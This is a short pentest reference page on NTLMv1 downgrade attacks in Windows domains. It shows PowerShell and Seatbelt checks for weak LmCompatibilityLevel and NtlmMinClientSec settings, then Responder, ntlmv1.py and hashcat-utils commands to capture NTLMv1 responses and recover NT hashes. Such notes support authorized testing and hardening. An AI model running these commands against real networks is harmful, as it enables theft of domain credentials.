# NTLMv1 Downgrade * * * * Client sends NTLMv1 response when `LmCompatibilityLevel` exists and is `2` or lower, which can be downgraded to "NTLMv1 w/o SSP" when `NtlmMinClientSec` is `0x20` or lower: | Property Name | Property Path | | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------- | | [LmCompatibilityLevel](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level) | `HKLM\SYSTEM\CurrentControlSet\Control\Lsa` | | [NtlmMinClientSec](http://systemmanager.ru/win2k_regestry.en/85673.htm) | `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0` | ## Check Check with PowerShell: ``` PS > (Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name LmCompatibilityLevel).LmCompatibilityLevel 2 PS > $decValue = (Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0\ -Name NtlmMinClientSec).NtlmMinClientSec PS > $hexValue = "0x" + [string]::Format("{0:x}", $decValue) PS > $hexValue 0x20 ``` Check with [Seatbelt](https://github.com/GhostPack/Seatbelt/blob/fa0f2d94a049d825bef77e103e33167250ed2ac0/Seatbelt/Commands/Windows/NtlmSettingsCommand.cs#L149) ([example](https://0xdf.gitlab.io/2021/04/10/htb-apt.html#seatbelt)): ``` Cmd > .\Seatbelt.exe NTLMSettings ``` ## Abuse {% content-ref url="../authentication-coercion" %} [authentication-coercion](https://ppn.snovvcra.sh/pentest/infrastructure/ad/authentication-coercion) {% endcontent-ref %} Abuse with Responder with a known challenge of `1122334455667788` (see **Authentication Coercion** to trigger callbacks): ``` $ sudo ./Responder.py -I eth0 -v --lm --disable-ess ``` ## ntlmv1-multi + crack.sh * * * * Calculate the token: ``` $ python ntlmv1.py --ntlmv1 '' ``` Check the final 2 bytes (4 characters) of the NT hash: ``` $ ~/tools/hashcat-utils/src/ct3_to_ntlm.bin 1122334455667788 ``` ## Public Rainbow Tables * *